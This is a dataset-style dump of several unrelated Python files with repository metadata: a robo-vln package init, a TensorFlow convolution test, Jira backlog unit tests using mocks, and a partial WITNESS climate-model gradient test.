| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
545ccb260f2ff919d32c1e8332d29c4969193170
| 151
|
py
|
Python
|
robo_vln_baselines/__init__.py
|
Felix2048/robo-vln
|
a9fbc6935e75fc0b3c9435a3f2a219ca4d19ef21
|
[
"MIT"
] | 38
|
2021-04-22T03:25:50.000Z
|
2022-03-31T14:21:36.000Z
|
robo_vln_baselines/__init__.py
|
Felix2048/robo-vln
|
a9fbc6935e75fc0b3c9435a3f2a219ca4d19ef21
|
[
"MIT"
] | 5
|
2021-06-02T03:29:13.000Z
|
2021-09-23T00:04:08.000Z
|
robo_vln_baselines/__init__.py
|
Felix2048/robo-vln
|
a9fbc6935e75fc0b3c9435a3f2a219ca4d19ef21
|
[
"MIT"
] | 5
|
2021-04-21T12:49:43.000Z
|
2021-07-29T02:43:37.000Z
|
from robo_vln_baselines import robo_vln_trainer
from robo_vln_baselines import hierarchical_trainer
from robo_vln_baselines.common import environments
| 37.75
| 51
| 0.913907
| 22
| 151
| 5.863636
| 0.409091
| 0.217054
| 0.255814
| 0.465116
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07947
| 151
| 3
| 52
| 50.333333
| 0.928058
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
547d8fe6b268992f1163594887b48eeb222900c5
| 766
|
py
|
Python
|
test/play_with_conv2d_transpose.py
|
brianlan/image-semantic-segmentation
|
aef172ed022091b9151f3eef1cc6213bbb122635
|
[
"MIT"
] | 3
|
2017-09-14T16:19:46.000Z
|
2018-02-28T12:51:31.000Z
|
test/play_with_conv2d_transpose.py
|
brianlan/image-semantic-segmentation
|
aef172ed022091b9151f3eef1cc6213bbb122635
|
[
"MIT"
] | 1
|
2017-09-14T16:20:14.000Z
|
2017-09-14T16:20:14.000Z
|
test/play_with_conv2d_transpose.py
|
brianlan/kaggle-carvana-semantic-segmentation-unet
|
aef172ed022091b9151f3eef1cc6213bbb122635
|
[
"MIT"
] | null | null | null |
import tensorflow as tf
def test_conv2d():
tf.set_random_seed(1)
x = tf.random_normal(shape=[1, 5, 5, 3])
kernel = tf.random_normal(shape=[2, 2, 3, 1])
y = tf.nn.conv2d(x, kernel, strides=[1, 1, 1, 1], padding="SAME")
sess = tf.Session()
tf.global_variables_initializer().run(session=sess)
a = y.eval(session=sess)
pass
def test_conv2d_transpose():
tf.set_random_seed(1)
x = tf.random_normal(shape=[1, 3, 3, 1])
kernel = tf.random_normal(shape=[2, 2, 3, 1])
y = tf.nn.conv2d_transpose(x, kernel, output_shape=[1, 5, 5, 3],
strides=[1, 2, 2, 1], padding="SAME")
sess = tf.Session()
tf.global_variables_initializer().run(session=sess)
a = y.eval(session=sess)
pass
| 26.413793
| 69
| 0.608355
| 122
| 766
| 3.680328
| 0.278689
| 0.071269
| 0.124722
| 0.169265
| 0.761693
| 0.734967
| 0.734967
| 0.734967
| 0.734967
| 0.734967
| 0
| 0.05753
| 0.22846
| 766
| 28
| 70
| 27.357143
| 0.7022
| 0
| 0
| 0.6
| 0
| 0
| 0.010444
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0.1
| 0.05
| 0
| 0.15
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
54a35666406b58ef10bf29928ed99b6a57c5d48e
| 19,579
|
py
|
Python
|
backend/tests/unittests/metric_source/jira_backlog_tests.py
|
ICTU/quality-report
|
f6234e112228ee7cfe6476c2d709fe244579bcfe
|
[
"Apache-2.0"
] | 25
|
2016-11-25T10:41:24.000Z
|
2021-07-03T14:02:49.000Z
|
backend/tests/unittests/metric_source/jira_backlog_tests.py
|
ICTU/quality-report
|
f6234e112228ee7cfe6476c2d709fe244579bcfe
|
[
"Apache-2.0"
] | 783
|
2016-09-19T12:10:21.000Z
|
2021-01-04T20:39:15.000Z
|
backend/tests/unittests/metric_source/jira_backlog_tests.py
|
ICTU/quality-report
|
f6234e112228ee7cfe6476c2d709fe244579bcfe
|
[
"Apache-2.0"
] | 15
|
2015-03-25T13:52:49.000Z
|
2021-03-08T17:17:56.000Z
|
"""
Copyright 2012-2018 Ministerie van Sociale Zaken en Werkgelegenheid
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import datetime
import unittest
from unittest.mock import patch, call
from hqlib.metric_source import JiraFilter, Jira
from hqlib.metric_source.jira_backlog import JiraBacklog, JQL_CONFIG
@patch.object(Jira, 'get_field_id')
@patch.object(Jira, 'get_query')
class JiraBacklogWithLtcsTests(unittest.TestCase):
""" Unit tests for """
def test_nr_user_stories_with_sufficient_ltcs(self, mock_get_query, mock_get_field_id):
""" Tests that the function invokes correct default jql query. """
mock_get_query.return_value = {"issues": [{"fields": {"custom_123": 1, "issuelinks": [{"id": "1"}]}}]}
mock_get_field_id.return_value = 'custom_123'
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'custom_field_name')
result = backlog.nr_user_stories_with_sufficient_ltcs()
self.assertEqual((1, [{"fields": {"custom_123": 1, "issuelinks": [{"id": "1"}]}}]), result)
mock_get_field_id.assert_called_once_with('custom_field_name')
def test_nr_user_stories_with_sufficient_ltcs_multi(self, mock_get_query, mock_get_field_id):
""" Tests that the function invokes correct default jql query. """
mock_get_query.side_effect = [{"issues": [{"fields": {"custom_123": 1, "issuelinks": [{"id": "1"}]}}]},
{"issues": [{"fields": {"custom_123": 1, "issuelinks": [{"id": "2"}]}}]}]
mock_get_field_id.return_value = 'custom_123'
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'custom_field_name',
jql_config={"nr_user_stories_with_sufficient_ltcs": ['1st {project}', '2nd {project}']})
result = backlog.nr_user_stories_with_sufficient_ltcs()
self.assertEqual((2, [{"fields": {"custom_123": 1, "issuelinks": [{"id": "1"}]}},
{"fields": {"custom_123": 1, "issuelinks": [{"id": "2"}]}}]), result)
mock_get_field_id.assert_called_once_with('custom_field_name')
self.assertEqual([call('1st project!'), call('2nd project!')], mock_get_query.call_args_list)
def test_nr_user_stories_with_sufficient_ltcs_error(self, mock_get_query, mock_get_field_id):
""" Tests that the function invokes correct default jql query. """
mock_get_field_id.return_value = None
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'custom_field_name')
result = backlog.nr_user_stories_with_sufficient_ltcs()
self.assertEqual((-1, []), result)
mock_get_field_id.assert_called_once_with('custom_field_name')
mock_get_query.assert_not_called()
@patch.object(logging, 'error')
def test_nr_user_stories_with_sufficient_ltcs_field(self, mock_error, mock_get_query, mock_get_field_id):
""" Tests that the function invokes correct default jql query. """
mock_get_query.return_value = {"issues": [{"fields": {"issuelinks": [{"id": "1"}]}}]}
mock_get_field_id.return_value = 'missing_custom_field'
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'custom_field_name')
result = backlog.nr_user_stories_with_sufficient_ltcs()
self.assertEqual((-1, []), result)
mock_get_field_id.assert_called_once_with('custom_field_name')
self.assertEqual('Error processing jira response. The key %s not found!', mock_error.call_args_list[0][0][0])
self.assertIsInstance(mock_error.call_args_list[0][0][1], KeyError)
@patch.object(JiraFilter, 'nr_issues')
class JiraBacklogTests(unittest.TestCase):
""" Unit tests of the constructor of the Jira class. """
# pylint: disable=too-many-public-methods
@patch.object(JiraFilter, '__init__')
def test_init(self, mock_init, mock_nr_issues):
""" Tests that the inner JiraFilter is initialized with correct parameters """
mock_init.return_value = None
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
backlog.nr_user_stories()
mock_nr_issues.assert_called_once()
mock_init.assert_called_once_with('url!', 'username!', 'password!')
self.assertEqual('Jira backlog', backlog.metric_source_name)
def test_nr_user_stories(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.nr_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('project = "project!" AND type = Story')
def test_nr_user_stories_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"nr_user_stories": ['1st {project}', '2nd {project}']})
result = backlog.nr_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_nr_user_stories_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"nr_user_stories": [11, '12']})
result = backlog.nr_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_approved_user_stories(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.approved_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_approved_user_stories_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"approved_user_stories": ['1st {project}', '2nd {project}']})
result = backlog.approved_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_approved_user_stories_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"approved_user_stories": [11, '12']})
result = backlog.approved_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_reviewed_user_stories(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.reviewed_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_reviewed_user_stories_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"reviewed_user_stories": ['1st {project}', '2nd {project}']})
result = backlog.reviewed_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_reviewed_user_stories_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"reviewed_user_stories": [11, '12']})
result = backlog.reviewed_user_stories()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_reviewed_ltcs(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.reviewed_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_reviewed_ltcs_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"reviewed_ltcs": ['1st {project}', '2nd {project}']})
result = backlog.reviewed_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_reviewed_ltcs_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"reviewed_ltcs": [11, '12']})
result = backlog.reviewed_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_nr_ltcs(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.nr_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_nr_ltcs_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"nr_ltcs": ['1st {project}', '2nd {project}']})
result = backlog.nr_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_nr_ltcs_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"nr_ltcs": [11, '12']})
result = backlog.nr_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_approved_ltcs(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.approved_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_approved_ltcs_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"approved_ltcs": ['1st {project}', '2nd {project}']})
result = backlog.approved_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_approved_ltcs_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"approved_ltcs": [11, '12']})
result = backlog.approved_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_nr_automated_ltcs(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.nr_automated_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_nr_automated_ltcs_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"nr_automated_ltcs": ['1st {project}', '2nd {project}']})
result = backlog.nr_automated_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_nr_automated_ltcs_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"nr_automated_ltcs": [11, '12']})
result = backlog.nr_automated_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_nr_ltcs_to_be_automated(self, mock_nr_issues):
""" Tests that the function invokes correct default jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
result = backlog.nr_ltcs_to_be_automated()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once()
def test_nr_ltcs_to_be_automated_custom(self, mock_nr_issues):
""" Tests that the function invokes correct custom jql query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant',
jql_config={"nr_ltcs_to_be_automated": ['1st {project}', '2nd {project}']})
result = backlog.nr_ltcs_to_be_automated()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('1st project!', '2nd project!')
def test_nr_ltcs_to_be_automated_custom_filter_number(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
mock_nr_issues.return_value = 1, ['a']
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant',
jql_config={"nr_ltcs_to_be_automated": [11, '12']})
result = backlog.nr_ltcs_to_be_automated()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with('11', '12')
def test_nr_manual_ltcs(self, mock_nr_issues):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'Project Name', 'unimportant')
mock_nr_issues.return_value = 1, ['a']
result = backlog.nr_manual_ltcs()
self.assertEqual((1, ['a']), result)
mock_nr_issues.assert_called_once_with(JQL_CONFIG["nr_manual_ltcs"].format(project='Project Name'))
class JiraBacklogPlaceholdersTests(unittest.TestCase):
""" Unit tests for dummy functions """
def test_metric_source_urls(self):
""" Tests that the function correctly formats display url. """
backlog = JiraBacklog('http://url', 'username!', 'password!', 'whatever!?', 'unimportant')
self.assertEqual(['http://url/issues/?jql=key%20in%20(issue-1)'], backlog.metric_source_urls('issue-1'))
def test_metric_source_urls_many_issues(self):
""" Tests that the function correctly formats display url. """
backlog = JiraBacklog('http://url', 'username!', 'password!', 'whatever!?', 'unimportant')
self.assertEqual(['http://url/issues/?jql=key%20in%20(issue-1%2Cissue-2)'],
backlog.metric_source_urls('issue-1', 'issue-2'))
def test_date_of_last_manual_test(self):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant')
self.assertEqual(datetime.datetime.min, backlog.date_of_last_manual_test())
def test_manual_test_execution_url(self):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant')
self.assertEqual('', backlog.manual_test_execution_url())
def test_nr_manual_ltcs_too_old(self):
""" Tests that the function invokes correct default jql query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
self.assertEqual(-1, backlog.nr_manual_ltcs_too_old('1', 1))
def test_nr_manual_ltcs_too_old_custom(self):
""" Tests that the function invokes correct custom jql query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'project!', 'unimportant')
self.assertEqual(-1, backlog.nr_manual_ltcs_too_old('1', 1))
def test_nr_manual_ltcs_too_old_custom_filter_number(self):
""" Tests that the function invokes correct custom jira filter number instead of the query. """
backlog = JiraBacklog('url!', 'username!', 'password!', 'whatever!?', 'unimportant')
self.assertEqual(-1, backlog.nr_manual_ltcs_too_old('1', 1))
| 55.622159
| 118
| 0.653506
| 2,384
| 19,579
| 5.075503
| 0.07802
| 0.05157
| 0.076364
| 0.059504
| 0.868595
| 0.853554
| 0.831818
| 0.807025
| 0.774463
| 0.754132
| 0
| 0.014967
| 0.204862
| 19,579
| 351
| 119
| 55.780627
| 0.762269
| 0.168241
| 0
| 0.609054
| 0
| 0.004115
| 0.191121
| 0.010351
| 0
| 0
| 0
| 0
| 0.296296
| 1
| 0.152263
| false
| 0.156379
| 0.160494
| 0
| 0.325103
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3fbd61336970a5bb420c62ac7c63dfe58c697a0c
| 19,288
|
py
|
Python
|
climateeconomics/tests/utility_tests/_l1_test_gradient_witness_full.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2022-01-14T06:37:42.000Z
|
2022-01-14T06:37:42.000Z
|
climateeconomics/tests/utility_tests/_l1_test_gradient_witness_full.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
climateeconomics/tests/utility_tests/_l1_test_gradient_witness_full.py
|
os-climate/witness-core
|
3ef9a44d86804c5ad57deec3c9916348cb3bfbb8
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
'''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from os.path import join, dirname
import numpy as np
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from sos_trades_core.tests.core.abstract_jacobian_unit_test import AbstractJacobianUnittest
from climateeconomics.sos_processes.iam.witness.witness.usecase_witness import Study as witness_usecase
from climateeconomics.sos_processes.iam.witness.witness_optim_sub_process.usecase_witness_optim_sub import Study as witness_sub_proc_usecase
class WitnessFullJacobianDiscTest(AbstractJacobianUnittest):
#AbstractJacobianUnittest.DUMP_JACOBIAN = True
obj_const = ['welfare_objective', 'temperature_objective', 'CO2_objective', 'ppm_objective', 'co2_emissions_objective',
'CO2_tax_minus_CO2_damage_constraint_df', 'primary_energies_production', 'CO2_tax_minus_CCS_constraint_df', 'land_demand_constraint_df']
def setUp(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
def analytic_grad_entry(self):
return [
self.test_05_adjoint_with_bsplines,
# self.test_02_gradient_residus_wrt_state_var_on_witness_full,
# self.test_03_gradient_residus_wrt_design_var_on_witness_full,
# self.test_04_gradient_objective_wrt_design_var_on_witness_full
]
def test_01_gradient_objective_wrt_state_var_on_witness_full(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
repo = 'climateeconomics.sos_processes.iam.witness'
chain_builders = self.ee.factory.get_builder_from_process(
repo, 'witness')
ns_dict = {'ns_functions': f'{self.ee.study_name}',
'ns_optim': f'{self.ee.study_name}',
'ns_public': f'{self.ee.study_name}', }
self.ee.ns_manager.add_ns_def(ns_dict)
self.ee.factory.set_builders_to_coupling_builder(
chain_builders)
self.ee.configure()
usecase = witness_usecase(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = {}
for dict_item in usecase.setup_usecase():
values_dict.update(dict_item)
values_dict['Test.epsilon0'] = 1.0
values_dict['Test.tolerance_linear_solver_MDO'] = 1.0e-12
values_dict['Test.linearization_mode'] = 'adjoint'
values_dict['Test.tolerance'] = 1.0e-10
values_dict['Test.sub_mda_class'] = 'MDAGaussSeidel'
self.ee.load_study_from_input_dict(values_dict)
output_full_names = [f'Test.{obj}' for obj in self.obj_const]
input_full_names = ['Test.EnergyMix.invest_energy_mix',
'Test.CO2_taxes']
self.ee.display_treeview_nodes()
disc = self.ee.root_process
self.check_jacobian(location=dirname(__file__), filename=f'jacobian_objective_wrt_state_var_on_witness_full.pkl', discipline=disc, inputs=input_full_names,
outputs=output_full_names, derr_approx='complex_step', step=1.0e-12, parallel=True)
def test_02_gradient_residus_wrt_state_var_on_witness_full(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
repo = 'climateeconomics.sos_processes.iam.witness'
chain_builders = self.ee.factory.get_builder_from_process(
repo, 'witness')
ns_dict = {'ns_functions': f'{self.ee.study_name}',
'ns_optim': f'{self.ee.study_name}',
'ns_public': f'{self.ee.study_name}', }
self.ee.ns_manager.add_ns_def(ns_dict)
self.ee.factory.set_builders_to_coupling_builder(
chain_builders)
self.ee.configure()
usecase = witness_usecase(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = {}
for dict_item in usecase.setup_usecase():
values_dict.update(dict_item)
values_dict['Test.epsilon0'] = 1.0
values_dict['Test.tolerance_linear_solver_MDO'] = 1.0e-8
values_dict['Test.linearization_mode'] = 'adjoint'
values_dict['Test.tolerance'] = 1.0e-10
values_dict['Test.sub_mda_class'] = 'MDAGaussSeidel'
self.ee.load_study_from_input_dict(values_dict)
disc = self.ee.root_process
output_full_names = ['Test.temperature_df', 'Test.utility_df', 'Test.economics_df',
'Test.carboncycle_df', 'Test.CO2_emissions_df', 'Test.damage_df', 'Test.EnergyMix.energy_production', 'Test.EnergyMix.energy_investment', 'Test.EnergyMix.co2_emissions_Gt', 'Test.EnergyMix.energy_mean_price']
input_full_names = ['Test.EnergyMix.invest_energy_mix',
'Test.CO2_taxes']
input_full_names.extend(
[f'Test.EnergyMix.{energy}.invest_techno_mix' for energy in usecase.energy_list])
self.check_jacobian(location=dirname(__file__), filename=f'jacobian_residus_wrt_state_var_on_witness_full.pkl', discipline=disc, inputs=input_full_names,
outputs=output_full_names, derr_approx='complex_step', step=1.0e-15, parallel=True)
def test_03_gradient_residus_wrt_design_var_on_witness_full(self):
self.name = 'Test'
self.ee = ExecutionEngine(self.name)
coupling_name = "WITNESS_Eval"
designvariable_name = "DesignVariables"
func_manager_name = "FunctionsManager"
extra_name = 'WITNESS'
# retrieve energy process
chain_builders = self.ee.factory.get_builder_from_process(
'climateeconomics.sos_processes.iam.witness', 'witness')
# modify namespaces defined in the child process
self.ee.ns_manager.update_namespace_list_with_extra_ns(
extra_name, after_name=self.ee.study_name)
self.ee.factory.update_builder_list_with_extra_name(
extra_name, builder_list=chain_builders)
# design variables builder
design_var_path = 'climateeconomics.core.design_variables_translation.witness.design_var_disc.Design_Var_Discipline'
design_var_builder = self.ee.factory.get_builder_from_module(
f'{designvariable_name}', design_var_path)
chain_builders.append(design_var_builder)
# # function manager builder
# fmanager_path = 'sos_trades_core.execution_engine.func_manager.func_manager_disc.FunctionManagerDisc'
# fmanager_builder = self.ee.factory.get_builder_from_module(
# f'{func_manager_name}', fmanager_path)
# chain_builders.append(fmanager_builder)
# modify namespaces defined in the child process
for ns in self.ee.ns_manager.ns_list:
self.ee.ns_manager.update_namespace_with_extra_ns(
ns, coupling_name, after_name=self.ee.study_name)
ns_dict = {'ns_functions': f'{self.ee.study_name}.{coupling_name}.{extra_name}',
'ns_public': f'{self.ee.study_name}',
'ns_optim': f'{self.ee.study_name}'}
self.ee.ns_manager.add_ns_def(ns_dict)
# create coupling builder
coupling_builder = self.ee.factory.create_builder_coupling(
coupling_name)
coupling_builder.set_builder_info('cls_builder', chain_builders)
coupling_builder.set_builder_info('with_data_io', True)
self.ee.factory.set_builders_to_coupling_builder(coupling_builder)
self.ee.configure()
usecase = witness_sub_proc_usecase(execution_engine=self.ee)
usecase.study_name = self.name
values_dict = usecase.setup_usecase()
full_values_dict = {}
for dict_v in values_dict:
full_values_dict.update(dict_v)
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linear_solver_MDO_options'] = {'tol': 1.0e-14,
'max_iter': 50000}
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linear_solver_MDA_options'] = {'tol': 1.0e-14,
'max_iter': 50000}
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.linearization_mode'] = 'adjoint'
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.tolerance'] = 1.0e-12
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.max_mda_iter'] = 200
full_values_dict[f'{usecase.study_name}.WITNESS_Eval.sub_mda_class'] = 'MDAGaussSeidel'
self.ee.load_study_from_input_dict(full_values_dict)
disc = self.ee.root_process.sos_disciplines[0]
namespace = 'Test.WITNESS_Eval.WITNESS'
output_full_names = [f'{namespace}.temperature_df', f'{namespace}.utility_df', f'{namespace}.economics_df',
f'{namespace}.carboncycle_df', f'{namespace}.CO2_emissions_df', f'{namespace}.damage_df',
f'{namespace}.EnergyMix.energy_production', f'{namespace}.EnergyMix.energy_investment',
f'{namespace}.EnergyMix.co2_emissions_Gt', f'{namespace}.EnergyMix.energy_mean_price',
f'{namespace}.CO2_objective', f'{namespace}.ppm_objective',
f'{namespace}.temperature_objective', f'{namespace}.CO2_tax_minus_CO2_damage_constraint_df', f'{namespace}.CO2_tax_minus_CCS_constraint_df']
self.ee.display_treeview_nodes(display_variables=True)
# input_full_names = ['Test.WITNESS_Eval.CO2_taxes_array']
# for energy in full_values_dict[f'{self.name}.WITNESS_Eval.energy_list']:
# energy_wo_dot = energy.replace('.', '_')
# input_full_names.append(
# f'{self.name}.WITNESS_Eval.DesignVariables.{energy}.{energy_wo_dot}_array_mix')
